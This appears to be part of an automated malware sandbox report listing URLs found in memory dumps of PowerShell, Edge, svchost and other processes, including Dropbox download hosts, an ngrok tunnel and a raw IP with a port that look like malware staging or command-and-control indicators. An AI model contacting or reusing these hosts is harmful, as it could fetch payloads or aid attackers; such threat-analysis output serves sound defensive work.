                                                                    https://www.dropbox.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.powershell.exe, 00000010.00000002.2196048656.0000023356A4D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000006.00000003.1915561956.000001BA25B0F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1915561956.000001BA25A1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.dropbox.com/scl/fi/jpowershell.exe, 00000010.00000002.2196048656.0000023355A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.apppowershell.exe, 00000010.00000002.2196048656.0000023356807000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.docsend.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://permanently-removed.invalid/LogoutYxABzenmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://uc7417651da7018861fba6b46c6a.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.glarysoft.com/goto.php?a=upgradetopro&s=DiskDefrag340100134010023401003340100434010053401854113748.exe, 0000001A.00000000.2141718264.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2370310456.000000000047C000.00000002.00000001.01000000.00000014.sdmp, 854113748.exe, 0000001A.00000002.2371490999.0000000002420000.00000004.00001000.00020000.00000000.sdmp, 854113748.exe, 0000001D.00000002.2349961617.000000000047C000.00000002.00000001.01000000.00000014.sdmpfalse
                                                                                		high
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://edge-block-www-env.dropbox-dns.compowershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.dropboxstatic.com/static/powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://officeapps-df.live.compowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://uc99c9846721962dead0990bdd22.dl.dropboxusercontent.compowershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://api.login.yahoo.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://office.net/msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2023468036.0000012D1A121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335567C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000006.00000003.1915561956.000001BA25AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://login.yahoo.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.dropbox.com/playlist/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://onedrive.live.com/pickerpowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2094670219.0000012D32490000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1BD6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1C0AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1C0D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://www.dropbox.compowershell.exe, 00000002.00000002.2023468036.0000012D1A4D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://chrome.google.com/webstoremsedge.exe, 00000005.00000002.1932816002.0000404000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2143850625.00006F9000020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://go.micropowershell.exe, 00000002.00000002.2023468036.0000012D1B277000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A942000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023355B0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://permanently-removed.invalid/oauth/multiloginmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2068788249.0000012D2A193000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://crl.ver)svchost.exe, 00000006.00000002.3022485486.000001BA25800000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://permanently-removed.invalid/oauth2/v1/userinfomsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://162.213.210.250:6499/f0a115d49c8f2edda6ff622c/gq0ddw3q.l65gekernelbasentdllkernel32GetProcesfontdrvhost.exe, 0000001E.00000003.2468942402.0000000005945000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://www.dropbox.com/v/s/playlist/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www-env.dropbox-dns.compowershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://permanently-removed.invalid/OAuthLoginmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2023468036.0000012D1A347000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.compowershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      https://docs.sandbox.google.com/document/fsip/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://uc898afb4ff616a8fb22d4a8daa9.dl.dropboxusercontent.com/cd/0/get/CgDPeFSvLowGEXW92RFcU_wB9Trwpowershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://help.dropbox.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://msn.cn/msedge.exe, 00000014.00000002.2145514748.00006F900035C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://docs.google.com/presentation/fsip/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://canny.io/sdk.jspowershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://uc4b27ff15e7c6796783ab09a82f.dl.dropboxusercontent.compowershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000005.00000003.1917316255.000040400027C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000005.00000003.1916716616.0000404000278000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://permanently-removed.invalid/LogoutYxABmsedge.exe, 00000014.00000003.2065401229.00006F9000280000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.google.com/recaptcha/powershell.exe, 00000002.00000002.2023468036.0000012D1A4E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A53F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A54B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2023468036.0000012D1A4CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.0000023356172000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560F4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.000002335616E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2196048656.00000233560C4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://chromewebstore.google.com/msedge.exe, 00000005.00000002.1932816002.0000404000020000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2143850625.00006F9000020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
